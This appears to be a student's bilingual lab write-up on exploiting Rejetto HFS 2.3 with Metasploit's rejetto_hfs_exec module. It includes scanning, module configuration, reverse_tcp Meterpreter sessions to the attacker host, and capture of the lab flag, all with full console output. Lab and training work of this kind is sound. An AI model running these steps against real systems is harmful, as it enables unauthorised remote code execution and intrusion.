Penetration Testing Student v2 Host & Network Penetration Testing The Metasploit Framework (MSF)

Exploiting A Vulnerable HTTP File Server

Posted by r3kind1e on January 23, 2023

Exploiting A Vulnerable HTTP File Server

An HTTP File Server (HFS) is a web server that is designed for file & document sharing.

HTTP File Servers typically run on TCP port 80 and utilize the HTTP protocol for underlying communication.

Rejetto HFS is a popular free and open source HTTP file server that can be setup on both Windows and Linux.

Rejetto HFS V2.3 is vulnerable to a remote command execution attack.

MSF has an exploit module that we can utilize to gain access to the target system hosting the HSF.

利用易受攻击的 HTTP 文件服务器

HTTP 文件服务器 (HFS) 是一种专为文件和文档共享而设计的 Web 服务器。

HTTP 文件服务器通常在 TCP 端口 80 上运行,并利用 HTTP 协议进行基础通信。

Rejetto HFS 是一种流行的免费开源 HTTP 文件服务器,可以在 Windows 和 Linux 上设置。

Rejetto HFS V2.3 容易受到远程命令执行攻击。

MSF 有一个漏洞利用模块,我们可以利用它来访问托管 HSF 的目标系统。

Demo: Exploiting A Vulnerable HTTP File Server(演示:利用易受攻击的 HTTP 文件服务器)

The exploitation process is going to be a combination of all the previous sections that we’ve explored. First and foremost, we are going to perform some port scanning and enumeration on the target to identify whether or not there is an HTTP File Server running on the target. We are then going to enumerate the version of the HTTP File Server. And in this case, it should be Rejetto HFS 2.3. We are then going to load or search for the relevant exploit module, configure it, and then exploit it. And we should get a Meterpreter session.

Target IP Address: 10.2.24.160

Ensure that the PostgreSQL database service is started. That’ll ensure that we can communicate with the Metasploit Framework database and create our workspaces.

1

service postgresql start

Start up the Metasploit Framework console.

1

msfconsole

Check the status of the database to ensure that we are connected.

1

db_status

Create a workspace called HFS.

1

workspace -a HFS

We are currently working within the HFS workspace.

Set up the global variable for the RHOST option, so that we don’t need to specify the target IP whenever we want to load a module. It’s going to set the target IP for every module that we load.

1

setg RHOSTS 10.2.24.160

We’re going to perform an Nmap scan and store the results directly into the Metasploit Framework database.

-sS: Perform a SYN scan.

-sV: Perform service version detection.

-O: Perform operating system detection.

That is going to start the Nmap scan and it’ll store the Nmap scan results directly into the Metasploit Framework database in our current workspace. So we’ll be able to analyze the results directly from MSFConsole.

1

db_nmap -sS -sV -O 10.2.24.160

Access the port 80 within our browser just to confirm that we indeed have HFS running.

1

http://10.2.24.160

We have the Rejetto HTTP File Server version 2.3 running on port 80, as well as a few other services. From the Nmap scan, we’re also able to deduce the target operating system. And in this case, we can see it’s running Windows Server 2008 R2, which is very important when we will be specifying the Meterpreter payload and the platform that we want to utilize with the Meterpreter payload when utilizing the exploit module.

Now that we have an idea of what HTTP File Server is running on the target system, as well as the version, we can search or perform some vulnerability scanning directly through MSFConsole.

1

search type:exploit name:rejetto

1
2
3
4

use exploit/windows/http/rejetto_hfs_exec
show options
info
run

It automatically opens up a Meterpreter session.

1
2
3
4
5

meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x86/windows 
meterpreter > exit

We were able to obtain a Meterpreter session without specifying a payload. The reason that was the case is because we have two options that we can specify for this module.

SRVHOST: This is the local host to listen on. This must be an address on the local machine that’s used to deliver the payload.

SRVPORT

We can change the type of payload that we’re utilizing based on the operating system architecture we want.

1
2
3

set payload windows/x64/meterpreter/reverse_tcp
show options
run

We have a 64-bit Meterpreter session as opposed to previously, when the default payload specified was the 32-bit Meterpreter payload.

1
2
3
4

meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x64/windows

You can always customize the payload you use for every exploit module based on the target operating system, as well as the architecture.

That is how to exploit a vulnerable HTTP File Server.

Windows: HTTP File Server

Overview

A Kali GUI machine and a target machine running a vulnerable HTTP File Server server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).

Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.

Objective: Exploit the application and retrieve the flag!

Instructions:

  • Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
  • The IP address of the target machine is mentioned in the file “/root/Desktop/target”
  • Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1945.pdf

我自己的思路

1

Target IP Address : 10.0.19.137

1
2
3
4
5
6
7
8
9
10

root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
msf5 > workspace -a hfs
[*] Added workspace: hfs
[*] Workspace: hfs
msf5 > set RHOSTS 10.0.19.137
RHOSTS => 10.0.19.137

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

msf5 > db_nmap -sS -sV -O 10.0.19.137
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-23 17:47 IST
[*] Nmap: Nmap scan report for 10.0.19.137
[*] Nmap: Host is up (0.0029s latency).
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT      STATE SERVICE            VERSION
[*] Nmap: 80/tcp    open  http               HttpFileServer httpd 2.3
[*] Nmap: 135/tcp   open  msrpc              Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp  open  ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/23%OT=80%CT=1%CU=34221%PV=Y%DS=3%DC=I%G=Y%TM=63CE7B2
[*] Nmap: OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=
[*] Nmap: OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
[*] Nmap: OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
[*] Nmap: OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
[*] Nmap: OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
[*] Nmap: OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=7F%CD=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 86.99 seconds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

msf5 > hosts

Hosts
=====

address      mac  name  os_name      os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------      ---------  -----  -------  ----  --------
10.0.19.137             Windows 8.1                    client         

msf5 > services
Services
========

host         port   proto  name               state  info
----         ----   -----  ----               -----  ----
10.0.19.137  80     tcp    http               open   HttpFileServer httpd 2.3
10.0.19.137  135    tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
10.0.19.137  445    tcp    microsoft-ds       open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.19.137  3389   tcp    ssl/ms-wbt-server  open   
10.0.19.137  49152  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49153  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49154  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49155  tcp    msrpc              open   Microsoft Windows RPC

1
2
3
4
5
6
7
8

msf5 > search type:exploit name:rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

Rejetto HttpFileServer Remote Command Execution

Rejetto HttpFileServer 远程命令执行

由于文件 ParserLib.pas 中的正则表达式不佳,Rejetto HttpFileServer (HFS) 容易受到远程命令执行攻击。该模块通过使用“%00”绕过过滤来利用 HFS 脚本命令。此模块已在 Windows XP SP3、Windows 7 SP1 和 Windows 8 上的 HFS 2.3b 上成功测试。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.19.137      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.5:4444 
[*] Using URL: http://0.0.0.0:8080/dd0dlD
[*] Local IP: http://10.10.16.5:8080/dd0dlD
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /dd0dlD
[*] Sending stage (180291 bytes) to 10.0.19.137
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.0.19.137:49623) at 2023-01-23 18:06:25 +0530
[!] Tried to delete %TEMP%\AhmCpAHBTgeesQ.vbs, unknown result
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.5:4444 
[*] Using URL: http://0.0.0.0:8080/WGC9TXBGdHuXMWN
[*] Local IP: http://10.10.16.5:8080/WGC9TXBGdHuXMWN
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /WGC9TXBGdHuXMWN
[*] Sending stage (206403 bytes) to 10.0.19.137
[*] Meterpreter session 2 opened (10.10.16.5:4444 -> 10.0.19.137:49686) at 2023-01-23 18:10:06 +0530
[!] Tried to delete %TEMP%\xXApgs.vbs, unknown result
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

SEARCHING FOR CONTENT

1
2
3
4
5
6

meterpreter > search -f flag*
Found 2 results...
    c:\flag.txt (32 bytes)
    c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (481 bytes)
meterpreter > cat c:\\flag.txt
f74c8347798f4082daf4b4570dba094a
CATALOG
    FEATURED TAGS
    Penetration Testing Student Penetration Testing Student v2 Host & Network Penetration Testing The Metasploit Framework (MSF) Post-Exploitation Exploitation Assessment Methodologies System/Host Based Attacks Penetration Testing Professional Resource Development & Initial Access Enumeration Network Attacks TryHackMe Web Attacks Client-Side Attacks Penetration Testing Prerequisites PowerShell for Pentesters Footprinting & Scanning IELTS Information Gathering System Attacks experience 留学 Network-Based Attacks 安全评估工具 C++ Career Python Vulnerability Assessment crypto
    FRIENDS